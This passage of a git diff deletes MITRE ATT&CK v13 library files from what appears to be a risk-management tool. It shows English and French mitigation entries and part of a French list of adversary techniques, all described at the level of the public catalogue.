D\u00e9sactiver ou supprimer une fonctionnalit\u00e9 ou un programme", - "description": "Supprimez ou refusez l\u2019acc\u00e8s aux logiciels inutiles et potentiellement vuln\u00e9rables afin d\u2019\u00e9viter les abus par des adversaires.\nhttps://attack.mitre.org/mitigations/M1042\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1036 - Politiques d\u2019utilisation du compte", - "description": "Configurez les fonctionnalit\u00e9s li\u00e9es \u00e0 l\u2019utilisation du compte, telles que les tentatives de verrouillage de connexion, les heures de connexion sp\u00e9cifiques, etc.\nhttps://attack.mitre.org/mitigations/M1036\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1041 - Chiffrer les informations sensibles", - "description": "Prot\u00e9gez les informations sensibles gr\u00e2ce \u00e0 un chiffrement fort.\nhttps://attack.mitre.org/mitigations/M1041\n", - "provider": "MITRE ATT&CK" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/mitre-mitigations.json b/library/libraries/mitre-mitigations.json deleted file mode 100644 index 997bea9..0000000 --- a/library/libraries/mitre-mitigations.json +++ /dev/null @@ -1,353 +0,0 @@ -{ - "locale": "en", - "name": "MITRE ATT&CK v13 - Mitigations", - "description": "Mitigations from MITRE ATT&CK v13", - "format_version": "1.0", - "copyright": "\nTerms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK\u00ae for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.\n\"\u00a9 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "M1031 - Network Intrusion Prevention", - "description": "Use intrusion detection signatures to block traffic at network boundaries.\nhttps://attack.mitre.org/mitigations/M1031\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1016 - Vulnerability Scanning", - "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.\nhttps://attack.mitre.org/mitigations/M1016\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1035 - Limit Access to Resource Over Network", - "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.\nhttps://attack.mitre.org/mitigations/M1035\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1029 - Remote Data Storage", - "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.\nhttps://attack.mitre.org/mitigations/M1029\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1037 - Filter Network Traffic", - "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.\nhttps://attack.mitre.org/mitigations/M1037\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1021 - Restrict Web-Based Content", - "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.\nhttps://attack.mitre.org/mitigations/M1021\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1033 - Limit Software Installation", - "description": "Block users or groups from installing unapproved software.\nhttps://attack.mitre.org/mitigations/M1033\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1013 - Application Developer Guidance", - "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.\nhttps://attack.mitre.org/mitigations/M1013\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1034 - Limit Hardware Installation", - "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.\nhttps://attack.mitre.org/mitigations/M1034\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1017 - User Training", - "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.\nhttps://attack.mitre.org/mitigations/M1017\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1052 - User Account Control", - "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.\nhttps://attack.mitre.org/mitigations/M1052\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1028 - Operating System Configuration", - "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.\nhttps://attack.mitre.org/mitigations/M1028\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1053 - Data Backup", - "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.\nhttps://attack.mitre.org/mitigations/M1053\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1038 - Execution Prevention", - "description": "Block execution of code on a system through application control, and/or script blocking.\nhttps://attack.mitre.org/mitigations/M1038\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1043 - Credential Access Protection", - "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.\nhttps://attack.mitre.org/mitigations/M1043\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1045 - Code Signing", - "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.\nhttps://attack.mitre.org/mitigations/M1045\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1039 - Environment Variable Permissions", - "description": "Prevent modification of environment variables by unauthorized users and groups.\nhttps://attack.mitre.org/mitigations/M1039\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1057 - Data Loss Prevention", - "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)\nhttps://attack.mitre.org/mitigations/M1057\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1025 - Privileged Process Integrity", - "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.\nhttps://attack.mitre.org/mitigations/M1025\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1055 - Do Not Mitigate", - "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.\nhttps://attack.mitre.org/mitigations/M1055\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1056 - Pre-compromise", - "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.\nhttps://attack.mitre.org/mitigations/M1056\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1020 - SSL/TLS Inspection", - "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.\nhttps://attack.mitre.org/mitigations/M1020\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1046 - Boot Integrity", - "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.\nhttps://attack.mitre.org/mitigations/M1046\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1030 - Network Segmentation", - "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.\nhttps://attack.mitre.org/mitigations/M1030\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1019 - Threat Intelligence Program", - "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.\nhttps://attack.mitre.org/mitigations/M1019\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1027 - Password Policies", - "description": "Set and enforce secure password policies for accounts.\nhttps://attack.mitre.org/mitigations/M1027\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1040 - Behavior Prevention on Endpoint", - "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.\nhttps://attack.mitre.org/mitigations/M1040\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1018 - User Account Management", - "description": "Manage the creation, modification, use, and permissions associated to user accounts.\nhttps://attack.mitre.org/mitigations/M1018\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1022 - Restrict File and Directory Permissions", - "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.\nhttps://attack.mitre.org/mitigations/M1022\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1026 - Privileged Account Management", - "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.\nhttps://attack.mitre.org/mitigations/M1026\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1024 - Restrict Registry Permissions", - "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.\nhttps://attack.mitre.org/mitigations/M1024\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1049 - Antivirus/Antimalware", - "description": "Use signatures or heuristics to detect malicious software.\nhttps://attack.mitre.org/mitigations/M1049\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1032 - Multi-factor Authentication", - "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.\nhttps://attack.mitre.org/mitigations/M1032\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1054 - Software Configuration", - "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.\nhttps://attack.mitre.org/mitigations/M1054\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1048 - Application Isolation and Sandboxing", - "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.\nhttps://attack.mitre.org/mitigations/M1048\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1047 - Audit", - "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.\nhttps://attack.mitre.org/mitigations/M1047\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1050 - Exploit Protection", - "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.\nhttps://attack.mitre.org/mitigations/M1050\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1015 - Active Directory Configuration", - "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.\nhttps://attack.mitre.org/mitigations/M1015\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1051 - Update Software", - "description": "Perform regular software updates to mitigate exploitation risk.\nhttps://attack.mitre.org/mitigations/M1051\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1044 - Restrict Library Loading", - "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.\nhttps://attack.mitre.org/mitigations/M1044\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1042 - Disable or Remove Feature or Program", - "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.\nhttps://attack.mitre.org/mitigations/M1042\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1036 - Account Use Policies", - "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.\nhttps://attack.mitre.org/mitigations/M1036\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1041 - Encrypt Sensitive Information", - "description": "Protect sensitive information with strong encryption.\nhttps://attack.mitre.org/mitigations/M1041\n", - "provider": "MITRE ATT&CK" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/mitre-techniques-fr.json b/library/libraries/mitre-techniques-fr.json deleted file mode 100644 index cc3e9d9..0000000 --- a/library/libraries/mitre-techniques-fr.json +++ /dev/null @@ -1,1577 +0,0 @@ -{ - "name": "MITRE ATT&CK v13 - Menaces", - "description": "Menaces depuis MITRE ATT&CK v13", - "format_version": "1.0", - "copyright": "\nTerms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK\u00ae for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.\n\"\u00a9 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n", - "objects": [ - { - "type": "threat", - "fields": { - "name": "\ufeffT1047 - Instrumentation de gestion Windows", - "description": "Les adversaires peuvent abuser de WMI (Windows Management Instrumentation) pour ex\u00e9cuter des commandes et des charges utiles malveillantes. WMI est une fonctionnalit\u00e9 d\u2019administration qui fournit un environnement uniforme pour acc\u00e9der aux composants syst\u00e8me Windows. Le service WMI permet \u00e0 la fois l\u2019acc\u00e8s local et distant, bien que ce dernier soit facilit\u00e9 par [Services distants](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) et [Gestion \u00e0 distance Windows](https://attack.mitre.org/techniques/T1021/006) (WinRM). (R\u00e9f\u00e9rence : MSDN WMI) WMI sur DCOM distant fonctionne \u00e0 l\u2019aide du port 135, tandis que WMI sur WinRM fonctionne sur le port 5985 lors de l\u2019utilisation de HTTP et 5986 pour HTTPS. (R\u00e9f\u00e9rence : MSDN WMI) (R\u00e9f\u00e9rence : FireEye WMI 2015) Un adversaire peut utiliser WMI pour interagir avec des syst\u00e8mes locaux et distants et l\u2019utiliser comme un moyen d\u2019ex\u00e9cuter divers comportements, tels que la collecte d\u2019informations pour la d\u00e9couverte ainsi que l\u2019ex\u00e9cution \u00e0 distance de fichiers dans le cadre du mouvement lat\u00e9ral. (Citation : FireEye WMI SANS 2015) (R\u00e9f\u00e9rence : FireEye WMI 2015)\nhttps://attack.mitre.org/techniques/T1047\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1113 - Capture d\u2019\u00e9cran", - "description": "Les adversaires peuvent tenter de prendre des captures d\u2019\u00e9cran du bureau pour recueillir des informations au cours d\u2019une op\u00e9ration. La fonctionnalit\u00e9 de capture d\u2019\u00e9cran peut \u00eatre incluse en tant que fonctionnalit\u00e9 d\u2019un outil d\u2019acc\u00e8s \u00e0 distance utilis\u00e9 dans les op\u00e9rations post-compromission. La capture d\u2019\u00e9cran est \u00e9galement g\u00e9n\u00e9ralement possible via des utilitaires natifs ou des appels d\u2019API, tels que CopyFromScreen, xwd ou screencapture. (Citation : CopyFromScreen .NET) (Citation : Logiciels malveillants Mac obsol\u00e8tes)\nhttps://attack.mitre.org/techniques/T1113\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1037 - Scripts d\u2019initialisation de d\u00e9marrage ou d\u2019ouverture de session", - "description": "Les adversaires peuvent utiliser des scripts ex\u00e9cut\u00e9s automatiquement au d\u00e9marrage ou \u00e0 l\u2019initialisation de l\u2019ouverture de session pour \u00e9tablir la persistance. Les scripts d\u2019initialisation peuvent \u00eatre utilis\u00e9s pour ex\u00e9cuter des fonctions administratives, qui peuvent souvent ex\u00e9cuter d\u2019autres programmes ou envoyer des informations \u00e0 un serveur de journalisation interne. Ces scripts peuvent varier en fonction du syst\u00e8me d\u2019exploitation et s\u2019ils sont appliqu\u00e9s localement ou \u00e0 distance. Les adversaires peuvent utiliser ces scripts pour maintenir la persistance sur un seul syst\u00e8me. Selon la configuration d\u2019acc\u00e8s des scripts d\u2019ouverture de session, des informations d\u2019identification locales ou un compte administrateur peuvent \u00eatre n\u00e9cessaires. Un adversaire peut \u00e9galement \u00eatre en mesure d\u2019augmenter ses privil\u00e8ges puisque certains scripts d\u2019initialisation de d\u00e9marrage ou d\u2019ouverture de session s\u2019ex\u00e9cutent avec des privil\u00e8ges plus \u00e9lev\u00e9s.\nhttps://attack.mitre.org/techniques/T1037\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1557 - Adversaire au milieu", - "description": "Les adversaires peuvent tenter de se positionner entre deux ou plusieurs appareils en r\u00e9seau \u00e0 l\u2019aide d\u2019une technique d\u2019adversaire au milieu (AiTM) pour prendre en charge des comportements de suivi tels que [Reniflage r\u00e9seau](https://attack.mitre.org/techniques/T1040) ou [Manipulation de donn\u00e9es transmises](https://attack.mitre.org/techniques/T1565/002). En abusant des fonctionnalit\u00e9s des protocoles r\u00e9seau courants qui peuvent d\u00e9terminer le flux de trafic r\u00e9seau (par exemple, ARP, DNS, LLMNR, etc.), les adversaires peuvent forcer un p\u00e9riph\u00e9rique \u00e0 communiquer via un syst\u00e8me contr\u00f4l\u00e9 par l\u2019adversaire afin qu\u2019ils puissent collecter des informations ou effectuer des actions suppl\u00e9mentaires. (Citation : Rapid7 MiTM Basics) Par exemple, les adversaires peuvent manipuler les param\u00e8tres DNS de la victime pour permettre d\u2019autres activit\u00e9s malveillantes telles que l\u2019emp\u00eachement/la redirection des utilisateurs d\u2019acc\u00e9der \u00e0 des sites l\u00e9gitimes et/ou la diffusion de logiciels malveillants suppl\u00e9mentaires. (R\u00e9f\u00e9rence : ttint_rat) (R\u00e9f\u00e9rence : dns_changer_trojans) (R\u00e9f\u00e9rence : ad_blocker_with_miner) Les adversaires peuvent \u00e9galement manipuler le DNS et tirer parti de leur position afin d\u2019intercepter les informations d\u2019identification des utilisateurs et les cookies de session. (R\u00e9f\u00e9rence : volexity_0day_sophos_FW) [Attaque de r\u00e9trogradation] Les https://attack.mitre.org/techniques/T1562/010 peuvent \u00e9galement \u00eatre utilis\u00e9s pour \u00e9tablir une position AiTM, par exemple en n\u00e9gociant une version moins s\u00e9curis\u00e9e, obsol\u00e8te ou plus faible du protocole de communication (SSL/TLS) ou de l\u2019algorithme de chiffrement. (R\u00e9f\u00e9rence : mitm_tls_downgrade_att) (R\u00e9f\u00e9rence : taxonomy_downgrade_att_tls) (R\u00e9f\u00e9rence : tlseminar_downgrade_att) Les adversaires peuvent \u00e9galement tirer parti de la position AiTM pour tenter de surveiller et/ou de modifier le trafic, comme dans [Manipulation des donn\u00e9es transmises](https://attack.mitre.org/techniques/T1565/002). Les adversaires peuvent configurer une position similaire \u00e0 AiTM pour emp\u00eacher le trafic de circuler vers la destination appropri\u00e9e, potentiellement vers [Impair Defenses](https://attack.mitre.org/techniques/T1562) et/ou \u00e0 l\u2019appui d\u2019un [d\u00e9ni de service r\u00e9seau](https://attack.mitre.org/techniques/T1498).\nhttps://attack.mitre.org/techniques/T1557\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1033 - D\u00e9couverte du propri\u00e9taire du syst\u00e8me/utilisateur", - "description": "Les adversaires peuvent tenter d\u2019identifier l\u2019utilisateur principal, l\u2019utilisateur actuellement connect\u00e9, l\u2019ensemble d\u2019utilisateurs qui utilise couramment un syst\u00e8me ou si un utilisateur utilise activement le syst\u00e8me. Ils peuvent le faire, par exemple, en r\u00e9cup\u00e9rant les noms d\u2019utilisateur des comptes ou en utilisant [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Les informations peuvent \u00eatre collect\u00e9es de diff\u00e9rentes mani\u00e8res \u00e0 l\u2019aide d\u2019autres techniques de d\u00e9couverte, car les d\u00e9tails de l\u2019utilisateur et du nom d\u2019utilisateur sont r\u00e9pandus dans tout un syst\u00e8me et incluent la propri\u00e9t\u00e9 du processus en cours d\u2019ex\u00e9cution, la propri\u00e9t\u00e9 du fichier/r\u00e9pertoire, les informations de session et les journaux syst\u00e8me. Les adversaires peuvent utiliser les informations de [D\u00e9couverte du propri\u00e9taire/utilisateur du syst\u00e8me](https://attack.mitre.org/techniques/T1033) lors de la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. Divers utilitaires et commandes peuvent acqu\u00e9rir ces informations, y compris whoami. Sous macOS et Linux, l\u2019utilisateur actuellement connect\u00e9 peut \u00eatre identifi\u00e9 avec w et who. Sous macOS, le dscl . liste /Utilisateurs | La commande grep -v '_' peut \u00e9galement \u00eatre utilis\u00e9e pour \u00e9num\u00e9rer les comptes d\u2019utilisateurs. Les variables d\u2019environnement, telles que %USERNAME% et $USER, peuvent \u00e9galement \u00eatre utilis\u00e9es pour acc\u00e9der \u00e0 ces informations. Sur les p\u00e9riph\u00e9riques r\u00e9seau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show users' et 'show ssh' peuvent \u00eatre utilis\u00e9es pour afficher les utilisateurs actuellement connect\u00e9s au p\u00e9riph\u00e9rique. (R\u00e9f\u00e9rence : show_ssh_users_cmd_cisco) (Citation : US-CERT TA18-106A Network Infrastructure Devices 2018)\nhttps://attack.mitre.org/techniques/T1033\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1583 - Acqu\u00e9rir l\u2019infrastructure", - "description": "Les adversaires peuvent acheter, louer ou louer des infrastructures qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Il existe une grande vari\u00e9t\u00e9 d\u2019infrastructures pour h\u00e9berger et orchestrer les op\u00e9rations adverses. Les solutions d\u2019infrastructure comprennent des serveurs physiques ou cloud, des domaines et des services Web tiers. (Citation: TrendmicroHideoutsLease) De plus, des botnets sont disponibles \u00e0 la location ou \u00e0 l\u2019achat. L\u2019utilisation de ces solutions d\u2019infrastructure permet aux adversaires d\u2019organiser, de lancer et d\u2019ex\u00e9cuter des op\u00e9rations. Les solutions peuvent aider les op\u00e9rations adverses \u00e0 se fondre dans le trafic consid\u00e9r\u00e9 comme normal, comme contacter des services Web tiers ou acqu\u00e9rir une infrastructure pour prendre en charge [Proxy](https://attack.mitre.org/techniques/T1090). (R\u00e9f\u00e9rence : amnesty_nso_pegasus) Selon la mise en \u0153uvre, les adversaires peuvent utiliser une infrastructure qui rend difficile le lien physique avec eux, ainsi qu\u2019une infrastructure qui peut \u00eatre rapidement provisionn\u00e9e, modifi\u00e9e et arr\u00eat\u00e9e.\nhttps://attack.mitre.org/techniques/T1583\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1613 - D\u00e9couverte de conteneurs et de ressources", - "description": "Les adversaires peuvent tenter de d\u00e9couvrir des conteneurs et d\u2019autres ressources disponibles dans un environnement de conteneurs. D\u2019autres ressources peuvent inclure des images, des d\u00e9ploiements, des espaces, des n\u0153uds et d\u2019autres informations telles que l\u2019\u00e9tat d\u2019un cluster. Ces ressources peuvent \u00eatre visualis\u00e9es dans des applications Web telles que le tableau de bord Kubernetes ou peuvent \u00eatre interrog\u00e9es via les API Docker et Kubernetes. (Citation : API Docker) (Citation : API Kubernetes) Dans Docker, les journaux peuvent divulguer des informations sur l\u2019environnement, telles que la configuration de l\u2019environnement, les services disponibles et le fournisseur de cloud utilis\u00e9 par la victime. La d\u00e9couverte de ces ressources peut informer un adversaire des prochaines \u00e9tapes dans l\u2019environnement, telles que la fa\u00e7on d\u2019effectuer un mouvement lat\u00e9ral et les m\u00e9thodes \u00e0 utiliser pour l\u2019ex\u00e9cution.\nhttps://attack.mitre.org/techniques/T1613\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1592 - Recueillir des informations sur l\u2019h\u00f4te de la victime", - "description": "Les adversaires peuvent recueillir des informations sur les h\u00f4tes de la victime qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les informations sur les h\u00f4tes peuvent inclure une vari\u00e9t\u00e9 de d\u00e9tails, y compris des donn\u00e9es administratives (par exemple, nom, adresse IP attribu\u00e9e, fonctionnalit\u00e9, etc.) ainsi que des d\u00e9tails concernant sa configuration (par exemple, syst\u00e8me d\u2019exploitation, langue, etc.). Les adversaires peuvent recueillir ces informations de diff\u00e9rentes mani\u00e8res, telles que des actions de collecte directe via [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Hame\u00e7onnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les adversaires peuvent \u00e9galement compromettre les sites, puis inclure du contenu malveillant con\u00e7u pour collecter des informations sur l\u2019h\u00f4te aupr\u00e8s des visiteurs. (R\u00e9f\u00e9rence : ATT ScanBox) Les informations sur les h\u00f4tes peuvent \u00e9galement \u00eatre expos\u00e9es \u00e0 des adversaires via des ensembles de donn\u00e9es en ligne ou d\u2019autres ensembles de donn\u00e9es accessibles (ex: [M\u00e9dias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Recherche sur les sites Web appartenant aux victimes](https://attack.mitre.org/techniques/T1594)). La collecte de ces renseignements peut r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex. : [Recherche sur des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche dans des bases de donn\u00e9es techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex. : [D\u00e9velopper des capacit\u00e9s](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacit\u00e9s](https://attack.mitre.org/techniques/T1588)), et/ou un acc\u00e8s initial (p. ex. : [Cha\u00eene d\u2019approvisionnement Compromis](https://attack.mitre.org/techniques/T1195) ou [Services \u00e0 distance externes](https://attack.mitre.org/techniques/T1133)).\nhttps://attack.mitre.org/techniques/T1592\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1003 - Dumping des informations d\u2019identification du syst\u00e8me d\u2019exploitation", - "description": "Les adversaires peuvent tenter de vider les informations d\u2019identification pour obtenir des informations d\u2019identification de connexion au compte et des informations d\u2019identification, normalement sous la forme d\u2019un hachage ou d\u2019un mot de passe en texte clair, \u00e0 partir du syst\u00e8me d\u2019exploitation et du logiciel. Les informations d\u2019identification peuvent ensuite \u00eatre utilis\u00e9es pour effectuer [Mouvement lat\u00e9ral](https://attack.mitre.org/tactics/TA0008) et acc\u00e9der \u00e0 des informations restreintes. Plusieurs des outils mentionn\u00e9s dans les sous-techniques associ\u00e9es peuvent \u00eatre utilis\u00e9s \u00e0 la fois par des adversaires et des testeurs de s\u00e9curit\u00e9 professionnels. D\u2019autres outils personnalis\u00e9s existent probablement aussi.\nhttps://attack.mitre.org/techniques/T1003\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1129 - Modules partag\u00e9s", - "description": "Les adversaires peuvent ex\u00e9cuter des charges utiles malveillantes en chargeant des modules partag\u00e9s. Le chargeur de module Windows peut \u00eatre invit\u00e9 \u00e0 charger des DLL \u00e0 partir de chemins d\u2019acc\u00e8s locaux arbitraires et de chemins r\u00e9seau UNC (Universal Naming Convention) arbitraires. Cette fonctionnalit\u00e9 r\u00e9side dans NTDLL.dll et fait partie de Windows [Native API](https://attack.mitre.org/techniques/T1106) qui est appel\u00e9 \u00e0 partir de fonctions telles que CreateProcess, LoadLibrary, etc. de l\u2019API 